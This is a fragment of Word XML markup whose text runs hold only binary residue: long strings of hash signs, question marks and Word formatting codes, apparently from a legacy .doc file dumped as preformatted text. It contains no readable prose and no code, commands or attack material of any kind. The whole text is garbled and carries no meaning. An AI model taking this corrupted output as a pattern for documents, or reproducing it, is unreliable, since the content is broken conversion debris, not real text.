        <w:t>################?#S</w:t>
        <w:br/>
        <w:t>###############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#?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4#</w:t>
        <w:tab/>
        <w:t>###$#G$#H$#If######?###?###?###?###?###########g############^############^############^############^############^##############################################################################################</w:t>
        <w:tab/>
        <w:t>###$#G$#H$#If#####?##kd#?###$##$#If#####?l##4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##?\##??b#?#?#? ?#?#################?#?#################?#?</w:t>
        <w:br/>
        <w:t>################?#S</w:t>
        <w:br/>
        <w:t>###############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#?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4###############$###*###6###8###g############^############^############^############^############^##############################################################################################</w:t>
        <w:tab/>
        <w:t>###$#G$#H$#If#####?##kd??###$##$#If#####?l##4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##?\##??b#?#?#? ?#?#################?#?#################?#?</w:t>
        <w:br/>
        <w:t>################?#S</w:t>
        <w:br/>
        <w:t>###############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#?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4###################"###$###(###*###4###B###F###H###Z###^###n###r###?###?###?###?###?###?###?###?####</w:t>
        <w:tab/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t xml:space="preserve">## </w:t>
        <w:tab/>
        <w:t>##(</w:t>
        <w:tab/>
        <w:t>##*</w:t>
        <w:tab/>
        <w:t>##2</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##&lt;</w:t>
        <w:tab/>
        <w:t>##&gt;</w:t>
        <w:tab/>
        <w:t>##F</w:t>
        <w:tab/>
        <w:t>##H</w:t>
        <w:tab/>
        <w:t>##P</w:t>
        <w:tab/>
        <w:t>##R</w:t>
        <w:tab/>
        <w:t>##T</w:t>
        <w:tab/>
        <w:t>##^</w:t>
        <w:tab/>
        <w:t>##b</w:t>
        <w:tab/>
        <w:t>##d</w:t>
        <w:tab/>
        <w:t>##l</w:t>
        <w:tab/>
        <w:t>##n</w:t>
        <w:tab/>
        <w:t>##r</w:t>
        <w:tab/>
        <w:t>##t</w:t>
        <w:tab/>
        <w:t>##z</w:t>
        <w:tab/>
        <w:t>##|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&lt;</w:t>
        <w:br/>
        <w:t>##&gt;</w:t>
        <w:br/>
        <w:t>##R</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?###?###??????????????????????????????????????????????????????????#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?g?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?&amp;p#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ#####h?###CJH#PJ##o(# #jq?###h?&gt;?##h?&lt;K#U##mH##nH##u###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?i:#CJ##o(###h?###CJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?&lt;K#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?Wf#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
        <w:tab/>
        <w:t>#h?Wf#o(#</w:t>
        <w:tab/>
        <w:t>#h?###o(##?8###:###B###H###\###^###p###g############[############R############R############R############R######################################################################</w:t>
        <w:tab/>
        <w:t>###$#G$#H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?##kd??###$##$#If#####?l##4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##?\##??b#?#?#? ?#?#################?#?#################?#?</w:t>
        <w:br/>
        <w:t>################?#S</w:t>
        <w:br/>
        <w:t>###############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#?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4###p###r###?###?###?###?###?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g############]############]############Q############Q############Q############Q############Q############Q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</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##?##kd??###$##$#If#####?l##4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##?\##??b#?#?#? ?#?#################?#?#################?#?</w:t>
        <w:br/>
        <w:t>################?#S</w:t>
        <w:br/>
        <w:t>###############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#?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###f4##</w:t>
        <w:tab/>
        <w:t>#</w:t>
        <w:tab/>
        <w:t>###</w:t>
        <w:tab/>
        <w:t xml:space="preserve">## </w:t>
        <w:tab/>
        <w:t>##*</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##&gt;</w:t>
        <w:tab/>
        <w:t>##;############/############/############/############/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?##kd[?###$##$#If#####T###?l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##?##??!#?</w:t>
        <w:br/>
        <w:t>;#?#U#? ?#?#################?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?T####&gt;</w:t>
        <w:tab/>
        <w:t>##H</w:t>
        <w:tab/>
        <w:t>##R</w:t>
        <w:tab/>
        <w:t>##T</w:t>
        <w:tab/>
        <w:t>##^</w:t>
        <w:tab/>
        <w:t>##d</w:t>
        <w:tab/>
        <w:t>##?############?############/############?############?##################?##kd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###$##$#If#####T###?l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##?##??!#?</w:t>
        <w:br/>
        <w:t>;#?#U#? ?#?#################?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?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#d</w:t>
        <w:tab/>
        <w:t>##n</w:t>
        <w:tab/>
        <w:t>##t</w:t>
        <w:tab/>
        <w:t>##|</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?############?############?############?############/##################?##kd??###$##$#If#####T###?l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##?##??!#?</w:t>
        <w:br/>
        <w:t>;#?#U#? ?#?#################?#?#################?#?#################?#?#################?#?#################?#?################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#?####?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?#?####?###?###?###?###?###?4?###</w:t>
        <w:br/>
        <w:t>#l#a?###?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#?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##&gt;</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?###?###?###?###?###?###?###?###?###?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$##?P##$#If####a$#gdO-?######$##?P##$#1$#If####a$#gdO-?######$##?P##$#1$#If####a$#gdO-?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd#(o######$#a$##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$###?###?###?###?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????????????????????????????????????????????#####h#(o##h?###CJ##o(###h#{g##h#(o#CJ#####h#{g##h#(o#CJ##o(###h??##h#(o#CJ##o(###h?g?#KH##OJ##PJ##QJ##a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fq?##h?g?## #hl2,##h?g?#KH##OJ##PJ##QJ##aJ#####hl2,##h?g?#KH##OJ##PJ##QJ##aJ##o(#</w:t>
        <w:br/>
        <w:t>#h?g?#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h#(o#CJ##o(##9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#######################################################$##dp?###$#1$#If####a$#gdO-?#?##kdL?###$##$#If#####T###?l##?##########################??##?\##??U</w:t>
        <w:br/>
        <w:t>R#?## ##?</w:t>
        <w:br/>
        <w:t>################?#?#################?#3#################?#?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?####?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l# ?########/?#######?####a?###p?(###?###?#####?###?#####?###?#####?###?##ytO-?#?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1############?############?#####################?##kdo?###$##$#If#####T###?l##?##########################?\##??U</w:t>
        <w:br/>
        <w:t>R#?## ##?</w:t>
        <w:br/>
        <w:t>##################?###################3###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?####?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?(###?###?#####?###?#####?###?#####?###?##ytO-?#?T#######$##dp?###$#1$#If####a$#gdO-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1############?############?#####################?##kdb?###$##$#If#####T###?l##?##########################?\##??U</w:t>
        <w:br/>
        <w:t>R#?## ##?</w:t>
        <w:br/>
        <w:t>##################?###################3###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?####?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?(###?###?#####?###?#####?###?#####?###?##ytO-?#?T#######$##dp?###$#1$#If####a$#gdO-?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1############?############?#####################?##kdU?###$##$#If#####T###?l##?##########################?\##??U</w:t>
        <w:br/>
        <w:t>R#?## ##?</w:t>
        <w:br/>
        <w:t>##################?###################3###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?####?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?(###?###?#####?###?#####?###?#####?###?##ytO-?#?T#######$##dp?###$#1$#If####a$#gdO-?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1#######################################################?##kdH?###$##$#If#####T###?l##?##########################?\##??U</w:t>
        <w:br/>
        <w:t>R#?## ##?</w:t>
        <w:br/>
        <w:t>##################?###################3###################?#################</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6##?####?####?####?###?###?###?#?####?###?###?###?#?####?###?###?###?#?####?###?###?###?4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?(###?###?#####?###?#####?###?#####?###?##ytO-?#?T#######$##dp?###$#1$#If####a$#gdO-?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?###?###?###J###?###?###N###?###?###?###|###X###?###?###?###?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?##dh###WD?#`??#gd? ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?###dh###WD##`?##gd?[?##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd#(o###?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##########,###?###?###?###6###H###J###\###?###?###?###L###N###`###?###?###?###?###?###?###?###?###B###j###t###?###############`###z###|###H###J###?###?###?###?###?###?###V###X###z###?###?###?###?###?###?###?###################?###?###?#######???????????????????????????????????????????####h#c?##h? ##CJ##o(###h?#x##h? ##CJ##o(#</w:t>
        <w:br/>
        <w:t>#h? ##CJ#####ht#?##h? ##CJ##o(###hq@?##h? ##CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h? ##CJ##o(###hq@?##h? ##CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?#?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?[?#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?[?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?&amp;p#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(##&lt;####`###?###?###?###?###?###?###?###?###?###############8###:###@#######</w:t>
        <w:br/>
        <w:t>###########?###?###?###?###?###?###?#######|###~###?###?###.###T###?###?###?###?###?###?###?###?###?###? ##? ##? ##? ##? ##?????????yy?????????????????????????????????{####h?###CJH#PJ##o(###h?###CJ##PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hSY?#CJ##o(###h?#?##h?g?#CJ#####h?y?##h?g?#CJ#####h?y?##h?g?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?g?#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?g?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(###h? ###h?###CJ##o(###hq@?##h? ##CJ##o(#</w:t>
        <w:br/>
        <w:t>#h? ##CJ#####h=bH##h? ##CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h? ##CJ##o(###h#c?##h? ##CJ##o(##0####:###</w:t>
        <w:br/>
        <w:t>#######~###?###?###?###? ##? ##? ##? ##h"##j"##?"##2###?###?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?###########################</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd?#Y######$#a$##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$######??##d,####?x#G$#H$#WD,#`??#gdSY?######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###?)##???#dh###1$#WD##^?)#`???a$#gd?g?##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd?g?######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###???#dh###1$#WD##`???a$#gd?g?###? ##? ##? ##? ##p!##?!##?!##?!##f"##h"##?"##?"##?"##?"##2###@###?###?###?###?###,$##N$##^$##t$##?$##?$##?$##?$##?%##?%##?%##?%##?%###&amp;###&amp;##&amp;&amp;##p&amp;##r&amp;##?&amp;##?&amp;##?&amp;###'###'##$'##F'##?(##?(##?(##?(###)###)###)##.)##0)##2)##&gt;)##R)##T)##x)##z)##?)##?)##?)##?????????????????????????????????????????????????????##</w:t>
        <w:br/>
        <w:t>#h?-?#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?}?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?i:#CJ##o(###h?y?##h?-?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?-?#CJ##o(#</w:t>
        <w:tab/>
        <w:t>#h?###o(###h?###CJH#PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?#?#CJ##o(###h?_?##h?#Y#CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?#Y#CJ##o(###h^4?##h?#Y#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(##&gt;?###?###,$##.$##t$##v$##?$###&amp;##r&amp;##?&amp;###'##?(##?(###)##2)##T)##?)##?)##J*##?*###+##6+##L+##?+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?x##???#d,####?x#G$#H$#WD??^?x#`???gdn#n##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###??##dh###WD?#`??#gd?i:##</w:t>
        <w:tab/>
        <w:t>###d,####?x#G$#H$##########$#a$###?)##?)##?)##?)##&amp;*##H*##J*##\*##?*##?*##?*###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4+##6+##L+##j+##p+##r+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+###,###,###,###,##.,##0,##V,##X,##Z,##??????????????????????????????x?x?x?x?x?x?q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h!U##h?x?##,#h?x?#5#?B*#CJ##OJ##QJ##\#?^J##aJ##o(#ph#####/#hh!U##h?x?#5#?B*#CJ##OJ##QJ##\#?^J##aJ##ph####2#hh!U##h?x?#5#?B*#CJ##OJ##QJ##\#?^J##aJ##o(#ph#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#hv#?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h</w:t>
        <w:br/>
        <w:t>#?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?}?#CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?J?#CJ##o(###h?###CJH#PJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?###CJ##o(#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#h?-?#CJ##o(#</w:t>
        <w:br/>
        <w:t>#h?###CJ###</w:t>
        <w:br/>
        <w:t>#h?i:#CJ##+?+##?+##?+##?+##?+##?+##?+##?+##?+##?+##?+###,###,###,###,##(,##0,##&lt;,##D,##?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?############?######################$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd?x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x?#####??##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####VD?#^??#gd</w:t>
        <w:br/>
        <w:t>#?#####$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?#####d,####?x#G$#H$#l?#!###?@############D,##P,##X,##Z,##\,##h,##r,##t,##v,##x,##z,##|,##~,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,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?#######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gd</w:t>
        <w:br/>
        <w:t>#?#####FfZ?######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?###Z,##\,##f,##h,##p,##r,##t,##z,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?????????|??|?eP9###############,#h?x?##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph???##)#h?x?##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph####,#h?x?##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####,#hh!U##h?x?#B*#CJ##OJ##QJ##^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h!U##h?x?##)#h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x?#B*#CJ##OJ##QJ##^J##aJ##ph???#)#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph######h?x?#B*#CJ##OJ##QJ##^J##aJ##ph####&amp;#h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#h?#?##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph######?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,###-###-###-###-###-###-##,-##.-##0-##2-##4-##6-##8-##:-##&lt;-##&gt;-##@-##B-##F-##?????????????????????z?????????&amp;#hv#?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####&amp;#h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#h?#?##h?x?#B*#CJ##OJ##QJ##^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h!U##h?x?##)#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph####,#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#h?x?##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph???##0?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,###-###-###-###-##.-##2-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########$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gd</w:t>
        <w:br/>
        <w:t>#?#####Ff??######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?###2-##6-##:-##&gt;-##B-##D-##H-##J-##L-##d-##h-##l-##p-##t-##x-##|-##?-##?-##?-##?-##?-##?-##?-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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#######$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gd</w:t>
        <w:br/>
        <w:t>#?#####Ff?#######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?###F-##H-##J-##L-##b-##d-##f-##h-##j-##l-##n-##p-##r-##t-##v-##x-##z-##|-##~-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##??η??????????η?????????????η?????##&amp;#h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####&amp;#hv#?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####,#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#h?#?##h?x?#B*#CJ##OJ##QJ##^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h!U##h?x?##)#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph#####8?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-###.###.###.###.##</w:t>
        <w:br/>
        <w:t>.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########$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####WD##a$#gd</w:t>
        <w:br/>
        <w:t>#?#####Ff?#######$##$##?###?@</w:t>
        <w:tab/>
        <w:t>#&amp;?#$#.??#If####a$#gd</w:t>
        <w:br/>
        <w:t>#?###?-##?-##?-##?-##?-###.###.###.###.##</w:t>
        <w:br/>
        <w:t>.###.###.###.###.## .##".##$.##&amp;.##(.##*.##,.##..##0.##2.##4.##6.##8.##&lt;.##&gt;.##@.##B.##J.##L.##P.##R.##T.##`.##b.##d.##f.##h.##j.##l.##n.##p.##r.##t.##v.##z.##|.##~.##?.##?.##?.##?.##?.##?.##???????????????????????????????????????????????##&amp;#hv#?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####&amp;#h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#h?#?##h?x?#B*#CJ##OJ##QJ##^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h!U##h?x?##,#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##o(#ph#####)#hh!U##h?x?#B*#CJ##OJ##QJ##^J##aJ##ph#####8</w:t>
        <w:br/>
        <w:t>.###.## .##$.##(.##,.##0.##4.##8.##:.##&gt;.##@.##B.##L.##T.##b.##f.##j.##n.##r.##v.##x.##|.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$#</w:t>
        <w:br/>
        <w:t>&amp;##F###$##?###?@</w:t>
